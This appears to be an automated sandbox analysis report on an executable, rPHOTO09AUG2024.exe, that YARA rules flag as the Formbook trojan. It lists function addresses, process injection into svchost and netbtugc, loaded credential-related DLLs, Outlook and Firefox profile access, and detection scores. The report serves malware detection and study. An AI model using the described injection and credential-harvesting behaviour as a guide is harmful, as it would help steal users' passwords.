Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E29EB0	4_2_02E29EB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DE3FD5	4_2_02DE3FD5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DE3FD2	4_2_02DE3FD2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EDFFB1	4_2_02EDFFB1
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E21F92	4_2_02E21F92
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EDFF09	4_2_02EDFF09
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EDFCF2	4_2_02EDFCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E99C32	4_2_02E99C32
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E3FDC0	4_2_02E3FDC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02ED7D73	4_2_02ED7D73
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E23D40	4_2_02E23D40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02ED1D5A	4_2_02ED1D5A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_023715E0	4_2_023715E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0236C7D0	4_2_0236C7D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0236C7C7	4_2_0236C7C7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0236AA70	4_2_0236AA70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0236C9F0	4_2_0236C9F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_023730F0	4_2_023730F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_023730EE	4_2_023730EE
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02389FD0	4_2_02389FD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02B6A0AF	4_2_02B6A0AF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02B6B8B4	4_2_02B6B8B4
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02B6B9D6	4_2_02B6B9D6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02B6ADD8	4_2_02B6ADD8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02B6BD6C	4_2_02B6BD6C

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03787E54 appears 102 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 037BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03775130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0372B970 appears 275 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 037AEA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 02E0B970 appears 275 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 02E8EA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 02E67E54 appears 102 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 02E9F290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 02E55130 appears 58 times
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: String function: 00D47F41 appears 35 times
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: String function: 00D60D27 appears 70 times
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: String function: 00D68B40 appears 42 times

Source: rPHOTO09AUG2024.exe, 00000000.00000003.2166123895.0000000003A73000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs rPHOTO09AUG2024.exe
Source: rPHOTO09AUG2024.exe, 00000000.00000003.2166242342.0000000003C1D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs rPHOTO09AUG2024.exe

Source: rPHOTO09AUG2024.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4641575979.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4643559111.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2316109187.0000000007000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4641284738.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2315423366.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4631777519.0000000002360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4641065257.0000000005F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2315722372.0000000003510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@14/11

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DAA2D5 GetLastError,FormatMessageW,

0_2_00DAA2D5

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D98713 AdjustTokenPrivileges,CloseHandle,		0_2_00D98713
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D98CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00D98CC3

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DAB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00DAB59E

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DBF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00DBF121

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DB86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00DB86D0

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00D44FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00D44FE9

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

File created: C:\Users\user\AppData\Local\Temp\autA80A.tmp

Jump to behavior

Source: rPHOTO09AUG2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: netbtugc.exe, 00000004.00000003.2502747739.000000000280B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4634931350.000000000282E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2500665286.0000000002801000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4634931350.0000000002801000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: rPHOTO09AUG2024.exe	ReversingLabs: Detection: 57%
Source: rPHOTO09AUG2024.exe	Virustotal: Detection: 28%

Source: unknown	Process created: C:\Users\user\Desktop\rPHOTO09AUG2024.exe "C:\Users\user\Desktop\rPHOTO09AUG2024.exe"
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPHOTO09AUG2024.exe"
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPHOTO09AUG2024.exe"	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: rPHOTO09AUG2024.exe

Static file information: File size 1273856 > 1048576

Source: rPHOTO09AUG2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: rPHOTO09AUG2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: rPHOTO09AUG2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: rPHOTO09AUG2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: rPHOTO09AUG2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: rPHOTO09AUG2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: rPHOTO09AUG2024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eODCXMCnMwxOuMbj.exe, 00000003.00000002.4631782931.00000000002CE000.00000002.00000001.01000000.00000004.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4636421686.00000000002CE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: rPHOTO09AUG2024.exe, 00000000.00000003.2166513300.0000000003950000.00000004.00001000.00020000.00000000.sdmp, rPHOTO09AUG2024.exe, 00000000.00000003.2166242342.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2219058048.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2220956043.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315752504.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315752504.000000000389E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4641803382.0000000002F7E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2318177102.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4641803382.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2315828615.0000000002A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: rPHOTO09AUG2024.exe, 00000000.00000003.2166513300.0000000003950000.00000004.00001000.00020000.00000000.sdmp, rPHOTO09AUG2024.exe, 00000000.00000003.2166242342.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2219058048.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2220956043.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315752504.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315752504.000000000389E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.4641803382.0000000002F7E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2318177102.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4641803382.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2315828615.0000000002A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2315611532.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2284057968.000000000301A000.00000004.00000020.00020000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000003.00000003.2254805415.0000000001235000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4634931350.000000000277E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4642290282.000000000340C000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000000.2389069612.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2608020002.00000000231AC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4634931350.000000000277E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4642290282.000000000340C000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000000.2389069612.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2608020002.00000000231AC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2315611532.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2284057968.000000000301A000.00000004.00000020.00020000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000003.00000003.2254805415.0000000001235000.00000004.00000020.00020000.00000000.sdmp

Source: rPHOTO09AUG2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: rPHOTO09AUG2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: rPHOTO09AUG2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: rPHOTO09AUG2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: rPHOTO09AUG2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DBC304 LoadLibraryA,GetProcAddress,

0_2_00DBC304

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D68B85 push ecx; ret	0_2_00D68B98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004048A9 push esp; ret	2_2_004048AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E2BA push 00000038h; iretd	2_2_0041E2BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A436 push ebx; iretd	2_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418C92 pushad ; retf	2_2_00418C93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A5D9 push ebx; iretd	2_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004017E5 push ebp; retf 003Fh	2_2_004017E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403780 push eax; ret	2_2_00403782
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004147A2 push es; iretd	2_2_004147AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0370225F pushad ; ret	2_2_037027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037027FA pushad ; ret	2_2_037027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx	2_2_037309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0370283D push eax; iretd	2_2_03702858
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Code function: 3_2_0622C6DD push 00000038h; iretd	3_2_0622C6E1
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Code function: 3_2_06212CCC push esp; ret	3_2_06212CCD
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Code function: 3_2_06226A4F push ebx; ret	3_2_06226A50
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Code function: 3_2_06231A9B push FFFFFFBAh; ret	3_2_06231A9D
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Code function: 3_2_06228859 push ebx; iretd	3_2_06228A23
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Code function: 3_2_062270B5 pushad ; retf	3_2_062270B6
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Code function: 3_2_062289FC push ebx; iretd	3_2_06228A23
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DE225F pushad ; ret	4_2_02DE27F9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DE27FA pushad ; ret	4_2_02DE27F9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DE283D push eax; iretd	4_2_02DE2858
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E109AD push ecx; mov dword ptr [esp], ecx	4_2_02E109B6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DE1368 push eax; iretd	4_2_02DE1369
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02372238 pushad ; iretd	4_2_02372239
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0237AB37 push 00000038h; iretd	4_2_0237AB3B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02376E56 push ebx; iretd	4_2_02376E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02370EAB push ebp; retf	4_2_02370EAC
